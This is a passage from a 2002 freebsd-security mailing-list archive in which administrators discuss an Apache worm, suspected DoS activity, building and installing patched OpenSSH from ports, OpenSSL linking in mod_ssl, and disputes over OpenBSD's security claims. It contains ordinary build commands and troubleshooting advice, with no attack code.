available commands, send a message to: > > > To subscribe to the list, send a message to: > > > To remove your address from the list, just send a message to > the address in the ``List-Unsubscribe'' header of any list > message. If you haven't changed addresses since subscribing, > you can also send a message to: > > > or for the digest to: > > > For addition or removal of addresses, I'll send a confirmation > message to that address. When you receive it, simply reply to it > to complete the transaction. > > If you need to get in touch with the human owner of this list, > please send a message to: > > > > Please include a FORWARDED list message with ALL HEADERS intact > to make it easier to help you. > > --- Enclosed is a copy of the request I received. > > Return-Path: > Received: (qmail 18074 invoked from network); 29 Jun 2002 17:46:57 -0000 > Received: from unknown (HELO securityfocus.com) (66.38.151.9) > by lists.securityfocus.com with SMTP; 29 Jun 2002 17:46:57 -0000 > Received: (qmail 7837 invoked by alias); 29 Jun 2002 17:42:18 -0000 > Date: 29 Jun 2002 17:42:18 -0000 > Message-ID: <20020629174218.7836.qmail@securityfocus.com> > Received: (qmail 7833 invoked from network); 29 Jun 2002 17:42:17 -0000 > Received: from npubs.com (HELO mail.npubs.com) (207.111.208.224) > by mail.securityfocus.com with SMTP; 29 Jun 2002 17:42:17 -0000 > Received: 8.12.2-(Neptune) > From: "NOC" > To: > Subject: > MIME-Version: 1.0 > Content-Type: text/plain; > charset="iso-8859-1" > Content-Transfer-Encoding: 7bit > X-Priority: 3 > X-MSMail-Priority: Normal > X-Mailer: Microsoft Outlook Express 6.00.2600.0000 > X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > -- +> îÅ ÍÏÇÕ ÓÔÏÑÔØ ËÏÇÄÁ ÄÒÕÇÉÅ ÒÁÂÏÔÁÀÔ, ÐÏÊÄÕ ÐÏÌÅÖÕ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 2: 8: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A3F4E37B400 for ; Mon, 1 Jul 2002 02:08:01 -0700 (PDT) Received: from grouper.daryl.org (64-51-175-231.client.dsl.net [64.51.175.231]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8F3EC43E0A for ; Mon, 1 Jul 2002 02:07:52 -0700 (PDT) (envelope-from Elan@daryl.org) Received: from ten ([209.214.90.4]) by grouper.daryl.org with Microsoft SMTPSVC(5.0.2195.2966); Mon, 1 Jul 2002 05:06:10 -0400 From: "Elan Hasson" To: "Brett Glass" , , "Domas Mituzas" Cc: , , Subject: RE: Apache worm in the wild Date: Mon, 1 Jul 2002 05:06:33 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal In-Reply-To: <4.3.2.7.2.20020628112127.024d9410@localhost> X-OriginalArrivalTime: 01 Jul 2002 09:06:12.0065 (UTC) FILETIME=[8BD58510:01C220DE] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dunno if anyone saw this: http://news.com.com/2100-1001-940585.html -----Original Message----- From: Brett Glass [mailto:brett@lariat.org] Sent: Friday, June 28, 2002 1:27 PM To: flynn@energyhq.homeip.net; Domas Mituzas Cc: freebsd-security@FreeBSD.ORG; bugtraq@securityfocus.com; os_bsd@konferencijos.lt Subject: Re: Apache worm in the wild At 05:38 AM 6/28/2002, flynn@energyhq.homeip.net wrote: >I wonder how many variants of this kind of thing we'll see, but I assume most people >running Apache have upgraded already. Upgrading Apache may prevent your system from being taken over, but it doesn't necessarily prevent it from being DoSed. One of my Apache servers, which had been upgraded to 2.0.39, went berserk on June 25th, spawning the maximum number of child processes and then locking up. The server did not appear to have been infiltrated, but the logs were filled with megabytes of messages indicating that the child processes were repeatedly trying to free chunks of memory that were already free. Probably the result of an attempted exploit going awry. (It could have been aimed at Linux, or at a different version of Apache; can't tell. But clearly it got somewhere, though not all the way.) --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 3:24:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1EC0037B400 for ; Mon, 1 Jul 2002 03:24:31 -0700 (PDT) Received: from eowyn.vianetworks.nl (eowyn.vianetworks.nl [212.61.25.227]) by mx1.FreeBSD.org (Postfix) with ESMTP id 71B4243E09 for ; Mon, 1 Jul 2002 03:24:30 -0700 (PDT) (envelope-from joao@bowtie.nl) Received: from uucp.iae.nl (uucp.iae.nl [212.61.26.37]) by eowyn.vianetworks.nl (Postfix) with ESMTP id 1693A210D0 for ; Mon, 1 Jul 2002 12:24:29 +0200 (CEST) Received: (from uucp@localhost) by uucp.iae.nl (8.9.1/8.9.1) with IAEhv.nl id MAA11218 for freebsd-security@freebsd.org; Mon, 1 Jul 2002 12:24:29 +0200 (MET DST) Received: from bowtie.nl (hume.intra.bowtie.nl [192.168.4.13]) by bowtie.nl (8.11.1/8.11.1) with ESMTP id g61ALMK24196 for ; Mon, 1 Jul 2002 12:21:22 +0200 (CEST) (envelope-from joao@bowtie.nl) Message-ID: <3D202D22.DFEBDF72@bowtie.nl> Date: Mon, 01 Jul 2002 12:21:22 +0200 From: Joao Schim Organization: BowTie Technology BV X-Mailer: Mozilla 4.72 [en] (X11; I; FreeBSD 4.0-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Re: SSH Patches References: <20020628193052.A42173-100000@blues.jpj.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Trevor Johnson wrote: > > > Are there going to be patches for the bundled FreeBSD OpenSSH anytime > > soon, so I can patch my 4.6-RELEASE system? :) > > Have you found a bug in your OpenSSH? > You mean that the other bugs Theo de Raadt spoke about (those 5600 lines) don't concern FreeBSD 4.6-RELEASE ? iirc there were more issues than just those pointed out by ISS. *confused* Regards Joao To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 4:28:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 93C5E37B400 for ; Mon, 1 Jul 2002 04:28:47 -0700 (PDT) Received: from public.uni-hamburg.de (public.uni-hamburg.de [134.100.32.55]) by mx1.FreeBSD.org (Postfix) with ESMTP id B1A9043E1A for ; Mon, 1 Jul 2002 04:28:46 -0700 (PDT) (envelope-from sa9k063@public.uni-hamburg.de) Received: (from sa9k063@localhost) by public.uni-hamburg.de (8.11.0/8.11.0) id g61BSje18914 for freebsd-security@freebsd.org; Mon, 1 Jul 2002 13:28:45 +0200 Date: Mon, 1 Jul 2002 13:28:45 +0200 From: Tilo Kremer To: freebsd-security@freebsd.org Subject: other DoSes Message-ID: <20020701132845.A88200@public.uni-hamburg.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre3i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org hi, apart from the apache worm, on friday i saw some other weird thing sgoing on on my freebsd machines: my dns was flooding my mx. resolver:53 -> mx:1032 contents of my sshd_config were changed (ChallengeResponse, PAMAuthenticationViaKbdInt) this looks like having been attacked on all fronts at the same time. i am ready to send logs upn request. grtx, t To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 5: 0:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 140F337B400; Mon, 1 Jul 2002 05:00:05 -0700 (PDT) Received: from smtp02.iafrica.com (smtp02.iafrica.com [196.7.0.140]) by mx1.FreeBSD.org (Postfix) with ESMTP id 01A9E43E55; Mon, 1 Jul 2002 05:00:02 -0700 (PDT) (envelope-from gareth@za.uu.net) Received: from gabba.so.cpt1.za.uu.net ([196.30.72.25]) by smtp02.iafrica.com with esmtp (Exim 3.20 #1) id 17OzqL-000Pct-00; Mon, 01 Jul 2002 13:59:45 +0200 Received: from localhost ([127.0.0.1]) by gabba.so.cpt1.za.uu.net with esmtp (Exim 3.31 #1) id 17Ozq6-0003CB-00; Mon, 01 Jul 2002 13:59:31 +0200 Date: Mon, 1 Jul 2002 13:59:30 +0200 (SAST) From: Gareth Hopkins X-X-Sender: ghopkins@gabba.so.cpt1.za.uu.net To: FreeBSD user Cc: Scott Gerhardt , FreeBSD , Subject: Re: Sshd fix In-Reply-To: <20020628190711.M7121-100000@Amber.XtremeDev.com> Message-ID: <20020701135406.W11499-100000@gabba.so.cpt1.za.uu.net> X-Cell: +27 82 389 5389 MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, 28 Jun 2002, FreeBSD user wrote: Fu>cd /usr/ports/security/openssh-portable && make -DOPENSSH_OVERWRITE_BASE Fu>install distclean howdie, I am having trouble building this with Kerberos 5 support. make.conf looks like this USA_RESIDENT=NO MASTER_SITE_OVERRIDE=ftp://ftp3.za.freebsd.org/pub/FreeBSD/distfiles/${DIST_SUBDIR}/ NO_SENDMAIL= true MAKE_KERBEROS5= yes ENABLE_SUID_K5SU= yes KRB5_HOME=/usr The command I am using is [root@foobar] /usr/ports/security/openssh-portable # WITH_KERBEROS5=yes make -DOPENSSH_OVERWRITE_BASE I then get this error message. cc -o ssh ssh.o sshconnect.o sshconnect1.o sshconnect2.o sshtty.o readconf.o clientloop.o -L. -Lopenbsd-compat/ -L/usr/lib -L/usr/lib -lssh -lopenbsd-compat -lutil -lz -lcrypto -lkrb5 -ldes -lcom_err -lasn1 -lroken /usr/lib/libkrb5.so: undefined reference to `crypt' *** Error code 1 Stop in /usr/ports/security/openssh-portable/work/openssh-3.4p1. *** Error code 1 Stop in /usr/ports/security/openssh-portable. There is a patch in the Makefile but when I run this patch from the makefile I get [root@foobar] /usr/ports/security/openssh-portable # WITH_KERBEROS5=yes make -DOPENSSH_OVERWRITE_BASE ===> Extracting for openssh-overwrite-base-3.4p1_2 >> Checksum OK for openssh-3.4p1.tar.gz. >> Checksum OK for openssh-3.4p1-gssapi-20020627.diff. ===> openssh-overwrite-base-3.4p1_2 depends on executable: autoconf - found ===> Patching for openssh-overwrite-base-3.4p1_2 ===> Applying extra patch /usr/ports/security/openssh-portable/files/servconf.c.patch ===> Applying FreeBSD patches for openssh-overwrite-base-3.4p1_2 Applying extra patch for GSS-API key-exchange... 1 out of 6 hunks failed--saving rejects to session.c.rej *** Error code 1 Stop in /usr/ports/security/openssh-portable. If I apply the patches manually from openssh-3.4p1-gssapi-20020627.diff. the patch works but then the make breaks. Anyone else having this problem? --- Gareth Hopkins Server Operations UUNET South Africa (o) +27.21.658.8700 (f) +27.21.658.8552 (m) +27.82.389.5389 http://www.uunet.co.za 08600 UUNET (08600 88638) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 5:34: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4475A37B401 for ; Mon, 1 Jul 2002 05:33:55 -0700 (PDT) Received: from south.nanolink.com (south.nanolink.com [217.75.134.10]) by mx1.FreeBSD.org (Postfix) with SMTP id D5DEE43E09 for ; Mon, 1 Jul 2002 05:33:53 -0700 (PDT) (envelope-from roam@ringlet.net) Received: (qmail 72557 invoked by uid 85); 1 Jul 2002 12:46:04 -0000 Received: from unknown (HELO straylight.ringlet.net) (212.116.140.125) by south.nanolink.com with SMTP; 1 Jul 2002 12:46:03 -0000 Received: (qmail 7537 invoked by uid 1000); 1 Jul 2002 12:32:34 -0000 Date: Mon, 1 Jul 2002 15:32:34 +0300 From: Peter Pentchev To: Tilo Kremer Cc: freebsd-security@freebsd.org Subject: Re: other DoSes Message-ID: <20020701123233.GC376@straylight.oblivion.bg> Mail-Followup-To: Tilo Kremer , freebsd-security@freebsd.org References: <20020701132845.A88200@public.uni-hamburg.de> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="MfFXiAuoTsnnDAfZ" Content-Disposition: inline In-Reply-To: <20020701132845.A88200@public.uni-hamburg.de> User-Agent: Mutt/1.5.1i X-Virus-Scanned: by Nik's Monitoring Daemon (AMaViS perl-11d ) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --MfFXiAuoTsnnDAfZ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Jul 01, 2002 at 01:28:45PM +0200, Tilo Kremer wrote: > hi, > apart from the apache worm, on friday i saw some other weird thing sgoin= g on on my freebsd machines: > my dns was flooding my mx. resolver:53 -> mx:1032 This is most probably in reverse: I would guess that, in fact, it was your mail exchanger sending lots of requests to your DNS server. The value of the port number at the MX's side - 1032 - seems like an ephemeral port, one that is allocated dynamically for each outgoing connection. Thus, my guess would be that something is actually flooding your MX server (or, to be a bit more pedantic, some service running on that server) with some kind of application requests, and the server is trying to resolve the flooder's IP addresses to hostnames so it can log them properly. Take a look at the logs of all the services running on your mail exchanger at the time; it does not have to be mail-related (web, SSH, FTP come to mind), and even if it is, you still have a choice between SMTP, POP3, IMAP, or some other e-mail related service. Try to find out which service was generating the name resolution requests, then try to find out whether they were indeed a result of an attack or just normal high traffic. G'luck, Peter --=20 Peter Pentchev roam@ringlet.net roam@FreeBSD.org PGP key: http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 I am the meaning of this sentence. --MfFXiAuoTsnnDAfZ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9IEvh7Ri2jRYZRVMRApZBAJwKRighlOIS7l55ziNSDzX+npTkMwCggzdw sldV14x3V+F+VNvli6wjQxc= =itjx -----END PGP SIGNATURE----- --MfFXiAuoTsnnDAfZ-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 6:24: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9103137B400 for ; Mon, 1 Jul 2002 06:24:02 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id 26F7543E09 for ; Mon, 1 Jul 2002 06:24:02 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 5EEFA5349; Mon, 1 Jul 2002 15:23:59 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Darren Reed Cc: security@freebsd.org Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current. References: <200206301817.EAA05639@caligula.anu.edu.au> From: Dag-Erling Smorgrav Date: 01 Jul 2002 15:23:59 +0200 In-Reply-To: <200206301817.EAA05639@caligula.anu.edu.au> Message-ID: Lines: 8 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Darren Reed writes: > With OpenSSH 3.4, ssh-keysign gets installed setuid-root. Not in FreeBSD. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 6:36:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A94BF37B400 for ; Mon, 1 Jul 2002 06:36:27 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3C95643E09 for ; Mon, 1 Jul 2002 06:36:27 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 922225349; Mon, 1 Jul 2002 15:36:24 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Joao Schim Cc: freebsd-security@freebsd.org Subject: Re: SSH Patches References: <20020628193052.A42173-100000@blues.jpj.net> <3D202D22.DFEBDF72@bowtie.nl> From: Dag-Erling Smorgrav Date: 01 Jul 2002 15:36:23 +0200 In-Reply-To: <3D202D22.DFEBDF72@bowtie.nl> Message-ID: Lines: 21 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Joao Schim writes: > You mean that the other bugs Theo de Raadt spoke about (those 5600 lines) > don't concern FreeBSD 4.6-RELEASE ? > > iirc there were more issues than just those pointed out by ISS. Theo has an agenda. His actions and words are intended to serve that agenda, not the needs of FreeBSD users. Your confusion arises from failure to recognize the gap between the two. Note that I'm not bashing Theo here. He did what he could to extract some positive publicity out of what was effectively a PR disaster for OpenBSD, engineered by ISS (who also have their agenda.) He got caught between a rock and a hard place and tried to make the most out of a rotten situation... no matter how much I disapprove of the ensuing circus, I can't really blame him for trying to defend himself, though I still think he went a little too far. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 6:42:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 617B437B401 for ; Mon, 1 Jul 2002 06:42:41 -0700 (PDT) Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8E6F543E09 for ; Mon, 1 Jul 2002 06:42:40 -0700 (PDT) (envelope-from anderson@centtech.com) Received: from sprint.centtech.com (sprint.centtech.com [10.177.173.31]) by proxy.centtech.com (8.11.6/8.11.6) with ESMTP id g61Dgb105264; Mon, 1 Jul 2002 08:42:37 -0500 (CDT) Received: (from root@localhost) by sprint.centtech.com (8.11.6+Sun/8.11.6) id g61Dgbg19681; Mon, 1 Jul 2002 08:42:37 -0500 (CDT) Received: from centtech.com (proton [10.177.173.77]) by sprint.centtech.com (8.11.6+Sun/8.11.6) with ESMTP id g61DgY519669; Mon, 1 Jul 2002 08:42:34 -0500 (CDT) Message-ID: <3D205C4A.3E1D2935@centtech.com> Date: Mon, 01 Jul 2002 08:42:34 -0500 From: Eric Anderson X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.2 i386) X-Accept-Language: en MIME-Version: 1.0 To: Dag-Erling Smorgrav Cc: freebsd-security@freebsd.org Subject: Re: SSH Patches References: <20020628193052.A42173-100000@blues.jpj.net> <3D202D22.DFEBDF72@bowtie.nl> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Although, it is almost sad to see: "One remote hole in the default install, in nearly 6 years!" On the OpenBSD page now. Oh well. Eric Dag-Erling Smorgrav wrote: > Note that I'm not bashing Theo here. He did what he could to extract > some positive publicity out of what was effectively a PR disaster for > OpenBSD, engineered by ISS (who also have their agenda.) He got > caught between a rock and a hard place and tried to make the most out > of a rotten situation... no matter how much I disapprove of the > ensuing circus, I can't really blame him for trying to defend himself, > though I still think he went a little too far. -- ------------------------------------------------------------------ Eric Anderson Systems Administrator Centaur Technology He who laughs last didn't get the joke. ------------------------------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 6:50:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0E12037B401 for ; Mon, 1 Jul 2002 06:50:29 -0700 (PDT) Received: from d188h80.mcb.uconn.edu (d188h80.mcb.uconn.edu [137.99.188.80]) by mx1.FreeBSD.org (Postfix) with SMTP id A924F43E1A for ; Mon, 1 Jul 2002 06:50:28 -0700 (PDT) (envelope-from sirmoo@cowbert.2y.net) Received: (qmail 29874 invoked by uid 1001); 1 Jul 2002 13:50:22 -0000 Date: Mon, 1 Jul 2002 09:50:22 -0400 From: "Peter C. Lai" To: "Jack L. Stone" Cc: Scott Robbins , FreeBSD user , Scott Gerhardt , FreeBSD , freebsd-security@FreeBSD.ORG Subject: Re: Sshd fix Message-ID: <20020701095022.A20329@cowbert.2y.net> Reply-To: peter.lai@uconn.edu References: <3.0.5.32.20020629173550.0117cc50@mail.sage-one.net> <3.0.5.32.20020629173550.0117cc50@mail.sage-one.net> <20020630004754.GA2600@scott1.homeunix.net> <3.0.5.32.20020629192508.0117cc50@mail.sage-one.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3.0.5.32.20020629192508.0117cc50@mail.sage-one.net>; from jackstone@sage-one.net on Sat, Jun 29, 2002 at 07:25:08PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, Jun 29, 2002 at 07:25:08PM -0500, Jack L. Stone wrote: > At 07:47 PM 6.29.2002 -0500, Scott Robbins wrote: > >On Sat, Jun 29, 2002 at 05:35:50PM -0500, Jack L. Stone wrote: > >> At 07:07 PM 6.28.2002 -0600, FreeBSD user wrote: > >> >cd /usr/ports/security/openssh-portable && make -DOPENSSH_OVERWRITE_BASE > >> install distclean > >> > > >> I just ran this on a test box and the sshd version shows no change... I saw > >> it compile and install, but #sshd -V gives old version #... > >> > >> What did I do wrong here...?? > > > >BTW after the other Scott's post, I tried it his way--leaving out > >sshd_enable and sshd_program. Worked quite well--also, one reason I > >haven't done the overwrite option--as Jonathan said, won't that get > >clobbered next time you do make world? > > > >Interestingly enough, pkg-message suggests doing this--leaving > >sshd_enable at YES, adding sshd_program and then editing the path, (I > >assume root's) so that /usr/local/sbin comes before /usr/sbin. > >However, I've found the lazy man's way, which seems to be efficient as > >well, to be a combination of Jonathan's and the other Scott's. > > > >I realize this is not exactly what Jack is asking, but I'm wondering > >too--if one does the OVERWRITE, won't it get clobbered upon the next > >make world? > > > >Thanks > >Scott Robbins > >> > This is what worries me too. I deinstalled the ssh port right afterwards, > but I'm wondering what else is changed. I noticed it updated the > openssl-0.9.6a to 0.9.6d that I didn't expect. The /var/db/pkg shows that > "d" version installed. > > I'm running SSL on that machine and it still says 0.9.6.a when I load > Apache_modssl and OpenSSH, etc. But, NOW, I'm really worried that I shot > myself in the foot and this is waiting to bite me later. ssl for apache (both apache13-modssl and apache13-ssl) statically links openssl. If you want to upgrade your modssl to use the new openssl, you should recompile and reinstall it. > > If anyone knows the answer to what Scott said about the next make world > clobbering things, please let me know.... > > Best regards, > Jack L. Stone, > Administrator > > SageOne Net > http://www.sage-one.net > jackstone@sage-one.net > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Peter C. Lai University of Connecticut Dept. of Molecular and Cell Biology | Undergraduate Research Assistant http://cowbert.2y.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 6:50:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0CC4537B401 for ; Mon, 1 Jul 2002 06:50:44 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1D38643E0A for ; Mon, 1 Jul 2002 06:50:43 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 397235349; Mon, 1 Jul 2002 15:50:41 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Eric Anderson Cc: freebsd-security@freebsd.org Subject: Re: SSH Patches References: <20020628193052.A42173-100000@blues.jpj.net> <3D202D22.DFEBDF72@bowtie.nl> <3D205C4A.3E1D2935@centtech.com> From: Dag-Erling Smorgrav Date: 01 Jul 2002 15:50:40 +0200 In-Reply-To: <3D205C4A.3E1D2935@centtech.com> Message-ID: Lines: 13 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Eric Anderson writes: > Although, it is almost sad to see: > > "One remote hole in the default install, in nearly 6 years!" > > On the OpenBSD page now. Oh well. *ahem* there are some who would say that "statistic" has been a blatant lie for almost as long as it's been on the web page. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 6:54: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 50BA937B400 for ; Mon, 1 Jul 2002 06:54:03 -0700 (PDT) Received: from smtp2.enst.fr (matrix2.enst.fr [137.194.2.14]) by mx1.FreeBSD.org (Postfix) with ESMTP id 73AC643E0A for ; Mon, 1 Jul 2002 06:54:02 -0700 (PDT) (envelope-from beyssac@bofh.enst.fr) Received: from bofh.enst.fr (bofh-2.enst.fr [137.194.2.37]) (using TLSv1 with cipher EDH-RSA-DES-CBC3-SHA (168/168 bits)) (Client CN "bofh.enst.fr", Issuer CN "ENST CA" (verified OK)) by smtp2.enst.fr (Postfix) with ESMTP id A26E41F06B; Mon, 1 Jul 2002 15:54:00 +0200 (MEST) Received: from bofh.enst.fr (localhost [127.0.0.1]) by bofh.enst.fr (8.12.3/8.12.3) with ESMTP id g61Drkkv091477 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Mon, 1 Jul 2002 15:53:46 +0200 (CEST) (envelope-from beyssac@bofh.enst.fr) Received: (from beyssac@localhost) by bofh.enst.fr (8.12.3/8.12.3/Submit) id g61DrkA8091476; Mon, 1 Jul 2002 15:53:46 +0200 (CEST) Date: Mon, 1 Jul 2002 15:53:45 +0200 From: Pierre Beyssac To: Eric Anderson Cc: Dag-Erling Smorgrav , freebsd-security@FreeBSD.ORG Subject: Re: SSH Patches Message-ID: <20020701155345.A90960@bofh.enst.fr> References: <20020628193052.A42173-100000@blues.jpj.net> <3D202D22.DFEBDF72@bowtie.nl> <3D205C4A.3E1D2935@centtech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3D205C4A.3E1D2935@centtech.com>; from anderson@centtech.com on Mon, Jul 01, 2002 at 08:42:34AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jul 01, 2002 at 08:42:34AM -0500, Eric Anderson wrote: > Although, it is almost sad to see: > > "One remote hole in the default install, in nearly 6 years!" > > On the OpenBSD page now. Oh well. Perhaps they should make that "No remote root in today's default install" instead. Sounds less likely to need a change in the future :-) -- Pierre Beyssac pb@enst.fr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the 